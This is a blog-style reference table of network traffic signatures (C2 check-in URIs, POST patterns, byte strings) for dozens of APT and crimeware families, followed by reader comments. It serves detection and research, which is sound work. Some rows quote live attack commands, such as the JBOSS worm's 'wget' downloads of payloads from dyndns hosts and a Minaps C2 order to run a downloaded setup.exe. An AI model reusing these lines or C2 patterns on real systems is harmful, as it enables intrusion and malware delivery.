APTDestory Rat / Sogu / ThoperPOST/update?product=windows
CRIMEDirtJumper DDoSPOST/678/index.php
CRIMEDirtjumper ddosPOST/boi854tr4w.php
CRIMEDNSChangerPOST/d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg==
APTDownloader BMPGET/images/evil.bmp
APTEinsteinGET/gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs
APTEinstein data sendPOST/gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK
CRIME EKEK - Blackhole 2 landingGET/news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd
CRIME EKEK Blackhole 1GET/showthread.php?t=d7ad916d1c0396ff
CRIME EKEK PhoenixGET/navigator/jueoaritjuir.php
APTEnfal / LuridGET/oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d
APTEnfal / LuridGET/trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite
APTEnfal / LuridPOST/cgi-bin/CMS_SubitAll.cgi
APTEnfal / LuridPOST/cgl-bin/Owpq4.cgi
APTEnfal / LuridPOST/Sjwpc/odw3ux
CRIMEFlashback OSXGET/statistics.html
APTFoxyPOST/404error.asp
APTFoxy CheckinGET/images/leftnav_prog_bg.jpg
APTGh0st ASP verGET/1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.0.69
APTGh0st PHP verGET/ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l
APTGh0st v2000 varnv2010........f...............(
......Service Pack 2..?..|...|...|0.@..
APTGoogleAdC2GET/html/lost.html
APTGoogleAdC2 2nd stageGET/Trojan2.jpg
APTGooglesGET/sll/monica.jpg
APTGreencatGET//
APTGtalkGET/facebook.png
HacktivismHOIC DDoSGET/ HTTP/1.0
CRIMEImautGET/setting.doc
CRIMEIRCbotGET/check_ver.php?version=1.09
APTIXESHEGET/AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/
wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A
APTIXESHE AESGET/AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=
+LLQhpkZ9LOhGbgqvJghHci7M
CRIMEJBOSS wormGET/zecmd/zecmd.jsp?comment=perl+lindb.pl
CRIMEJBOSS wormGET/idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz
CRIMEJBOSS wormGET/iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz
APTLetsgo / TabMsgSQLGET/indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc
ode%20=%20'IXLCGIXELZ'
APTLetsgo / TabMsgSQLGET/safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20
from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc
APTLetsgo / TabMsgSQLGET/safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20
(mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20
('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54',
'2011-06-08%2013:45:54','NMQVPTXFBH')
APTLetsgo / TabMsgSQL downloaderGET/new/iistart.html
APTLikseputGET/index.html
APTLingbo (?)POST/windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM
>QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb
APTLuckycat - WIMMIEPOST/count/count.php?m=c&n=[HOSTNAME]_
CRIMEMedfosGET/uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww==
APTMiniASPGET/device_asp?device_t=&key=&device_id=&cv=
APTMiniASPGET/record.asp?device_t= &key=&device_id=&cv=&result=
APTMinidukePOST/index.php
APTMiragePOST/resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow
APTMirage - later varGET/search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg
CRIMEMoney loaderGET/get_xml?file_id=25227372
/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536
APTMongalGET/3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000
APTMurcyGET/150828
APTNetravlerGET/fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT
APTNetravlerGET/fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt
APTNetravlerGET /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end
/nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc& amp;hostip=10.12.0.23&filename= travlerbackinfo-2012-1-
APTNfLogGET/IElog/TestURL.asp HTTP/1.0
APTNfLogPOST/NfLog/Nfile.asp
APTNTESSESSGET/6K8gL8.html
APTPNG trojanGET/index.htm
APTPoison IvyGET256 bytes of seemingly random data after a successful
TCP handshake, then 48 byte “keep-alive” requests
APTRedOctober AuthInfoPOSThttp://%s:%s%s
APTRedOctober SysinfoPOST/cgi-bin/nt/sk
APTRegSubDatPOST/5501000000/log
APTSanny / Win32.DawsPOST/write.php
APTSeasaltGET/postinfo.html
APTSofacyPOST/~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01
APTSofacyPOST/~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS
CRIMESrizbiGET/cb_4.exe
CRIMEStabuniqPOST/rssnews.php
APTSykipot / WyksolGET/kys_allowget.asp?namegetkys.kys
APTTaidoorGET/apzsr.php?id=021793111D309GE67E
APTTarsip EclipseGET/blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0
APTTarsip MoonGET/images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230
CRIMETbot torn
CRIMETinba aka ZusyPOST/h/index.php
APTVinselfPOST/w880/T19R17Q16/12010L11014
CRIMEVobfusGET/XEuPCLrf?e
APTWEBC2-BolidGET/firefox.html
APTWEBC2-CloverGET/Default.asp
APTWEBC2-CSONGET/Default.aspx?INDEX=<10_random_characters>
APTWEBC2-CSON Response to commandsPOST/Default.aspx?ID=IMNQRSSRXK
APTWEBC2-HEADGET/
APTWEBC2-TableGET/order.htm
CRIMEXpajPOST/DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh
APTXtreme RatGET/1234567890.functions
APTXtreme RatGET/1234567890.functions
CRIMEZeus GameoverGET/search.php?page=73a07bcb51f4be71
CRIMEBitcoinMinerPOST{"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}
CRIMEBlazebotIRCNICK USA|94576
USER vtptdwd 0 0 :USA|94576
CRIMENurjax AdwareGET/services/rules.txt?dummy=916
CRIMETosctGETY3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV
CRIMENocposGET POST/check/echo
/check
CRIMEOnionDukeGET/forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg=
s/sysinfo_7.php
/forum/phpBB3/prx_26.php
APTLagulon (Operation Cleaver)POST/contador/server.php
/i/server.php
/includes/server.php
APT?MedusaPOST%s/bbc_mirror/%s/search?id=%s
/CNN_Mirror/EN/%s/search?id=%s
|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00
CRIMEToopuGET/toopu.png
/%s:1048%s
/num3.html
/web/get_ad3.asp?type=loadall&machinename= -6C78A9C3&cr=yes
/num3_51la.asp
CRIMETwerkinGET/classes/functions.php?functionname=online
/classes/functions.php?functionname=getupdates
/classes/functions.php?functionname=getcommand
CRIMETzeeBot / TinyZBotPOST/checkupdate.asmx
CRIMEXLS URLDownload ToFileA function for DridexGET/koh/mui.php
CRIMEQuervar / Induc.C / DorifelGET/js/way.php?00021708&pin=7DF38AD66C78A9C3
/404/way.php?00038F50&pin=7DF38AD66C78A9C3
/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3
/1.php?JXU9WXFG&pin=DEC09603F4CEFD80
CRIMEFeidowns downloader / Kilim (?) / CracktoolsGETyeniadmin.php?os=WindowsXP
/yeniadmin.php?os=Windows7&osbit=64&antiv
/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI
http://whos.amung.us/pingjs/?k=yenikazi
CRIMEGameVance AdwareGET/aj/updtah.php
CRIMEOpenShopper AdwareGET//mmsv/Access3.php
//opendb/mmsv.php
//mmsv/Access2.php
/opapp/postmedia1/Update.dat
/opapp/postmedia1/OKUpdate.exe
CRIMESoftPulse AdwareGET/c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D
CRIMEFakeAVGET/[...]/load.php?file=uploader
/[...]/load.php?file=grabbers
/[…]/load.php?file=1
/ohwgx3kiTh/document.doc
/ohwgx3kiTh/load.php?file=0
CRIMEWauchos (download by Zbot of Cridex)POST/ssdc32716372/file.php
/auto*.it/*/jeve.exe
//dd*.ru/old.exe
CRIMEBlackenergy DDos BotPOSTid=[bot_id]&bid=[base64_encoded_build_
id]&dv=[x]&mv=[y]&dpv=[z]
id=[bot_id_sha1]&bid=[base64_encoded_build_
id]&nm=[x]&cn=[y]&num=[z]
The only major difference is that the id field contain just
the hash instead of the actual string
CRIMEAlurewo / Alureon pay per clickGET/click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5
CRIMEOSX WirelurkerGETmac/getversion.php?sn=
CRIMESystweak Adware - Systweak RegClean Pro & Advanced System ProtectorGET/getipaddress.asp
CRIMEMPlug / Multiplug AdwareGET/?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0&
page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7
371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436
02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E
+L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro
w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd%
2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+
-+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod
e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_
redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo
ut_id= 8&project_name=TusFiles&uuid=%252A
CRIME | Nemucod JS | GET | /document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=2129391
CRIME | Andromeda / Wauchos | POST | /and/gate.php
CRIME | Poweliks click-fraud | GET | /click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0
CRIME | Poweliks click-fraud | GET | /click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9
CRIME | Yoddos / Darkshell / YoYoDDoS | | 75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........
APT | Cobra / Turla | POST | /%s/%s?uid=%d&context=%s&mode=text&data=%s
APT | Panda | POST | /forum/login.cgi
APT | Panda | POST | /Photos/Query.cgi?loginid=
APT | Aided Frame | GET | /img/js.php
APT | Scanbox Watering hole framework | POST | /i/recv.php
CRIME | Blackenergy DDos Bot | GET | /upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php
APT | Syria Twitter.apk | POST | /contacts
APT | TinyBaron / Miniduke / CosmicDuke | GET | /modules/db/mgr.php?
    /modules/db/mgr.php?F=3?
CRIME | ?Moure | GET | /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=
    /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k
    /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n
    /G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr
    /GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu
    /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k
CRIME | Vundo | GET | /webhp
    /wpad.dat
CRIME / APT | Lostdoor RAT | | INFO||LostDoor-001|Remote PC|| Windows XP Professional|
APT | Protux worm | POST | " http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3
    http://202.71.136.14:80/ggBwkFNqDu1869.avi
    /newTroy.jpg"
    /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3
CRIME | Conficker / Kido worm | GET | / ip checking services
CRIME | Dingu / Proxy | GET | /1.jpg
    http://webemail.bounceme.net:8080/directget42.gif
CRIME | Dyre | GET | /1/manualec.pdf
CRIME | Zeus | GET | /ycJ2Jj7r4t3wc6y4/ali.jpg
CRIME | Cryptowall | POST | /tpnofu223t8h8dl
CRIME | Cryptowall | POST | /4175iq691v3l
    GET /raw
CRIME | Galapoper / Tibs Downloader | GET | /pic/tool.jpg
    /pic/search.jpg
    /pic/tibs.jpg
    /pic/proxy.jpg
    /pic/winlogon.jpg
APT | Wykcores | GET | /279843
    /279859
    /280015
    /287171
    /315171
    /110937
    /111968
    /113000
    /114031
    /115062
ADV | Ads - Zenovia Digital Exchange (not necessarily malicious) | GET | /?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs
CRIME | EsFury worm | GET | http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA
    http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT
CRIME | PornoAsset / LockEmAll Ransomware | GET | /a.php?f=647&e=2
CRIME | FakeAV Privacy Center | GET | /dfgsdfsdf.php
    /mf.php
    /css/new-mobile.css
    /js/wsjs.js
    /js/caf.js
CRIME | Zeus V2 (drop zone, config) | GET / POST | /panel3/gotobank.php
    /panel3/ppnl3.exe
    /panel3/ppnl3.bin
    /ppnl3.bin
CRIME | Blathla / Cadro adware | GET | /1.gif
CRIME | Vundo / Krap | POST | /
CRIME | Vundo / Krap | POST | /frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA
CRIME | VOlk bot | GET | /WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1
    User-Agent: vb wininet
    Host: portalcinemark.us
CRIME | Oficla / Sasfis | GET | /21/download.php?expid=0&fid=1
    /s/download.php?expid=4&fid=1
    /l1/bb.php?v=200&id=554905388&b=9468674099&tm=3
    /dmr/bb.php?v=200&id=554905388&b=OLD&tm=3
    /np/load.php?spl=hcp&b=ff&o=xp&i=hcp
    /phpbb/image2/cp.php?i=15
APT | Pingbed | GET | /default.htm
    /default1.htm
    /default2.htm
APT | Minaps backdoor | GET / POST | /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko
    /download/logo.png
    /download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A
    POST /download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi
CRIME | QHost / Orsam / Bicololo | GET | /stat/tuk/183

15 comments:

  1. This is exceptionally valuable to the community. Thanks for doing this.

  2. Perfect idea!

    Do you intend to publish some kind of mailing list that informs us when your database is added to?

    What do you do when requests are encrypted, or when GET/POST goes over a port other than 80?

    Thanks

    Replies
    1. Hi there, no, we plan for it to be low maintenance: see a pattern = add it; need to reference it = visit the link. People have enough spam in their mailboxes, and there is no easy way for us to deal with the mailings.
      Some of these are on port 443 and others.
      We might add a port column, but also see the links to the publications; they show and explain much more than the table, which is just a lookup reference. Thank you.

  3. Absolutely Spectacular!

  4. Awesome stuff, seriously! Mila and Andre' - keep up the fantastic work!!!

  5. Good stuff. Keep up the great work!!

  6. The fact is that Malsubjects will continue to cause havoc in cyberspace using everything they have in their power. It is time that we all realize that we are fighting a cyberwar where in many cases the malsubjects are winning many of these battles. It’s about time we defend ourselves with ALL we’ve got!

  7. I may have overlooked it, but is the password for the newly downloadable pcaps posted anywhere?

    Thanks,

    Replies
    1. You don't need a password to download the spreadsheet itself: go to File - Save As (you might need to use a Gmail account, not sure). For the malware and pcap downloads, it is the same scheme as on Contagiodump.blogspot.com; please email Mila for the password scheme (click on the name above in the post and replace (at) with @).

  8. Very useful, it's rare to find resources this good on APT

  9. It's the best pleasure to share the malware pcap files with the public. I have emailed you for the password. I hope you reply soon. Thank you very much. Those pcap files will help me to get further in my study on APT research.

  10. Amazing resource! Thank you so much.

  11. This is amazing, thank you.

  12. Thank you so much for taking the time to share this information. A great read. I'll certainly be back.
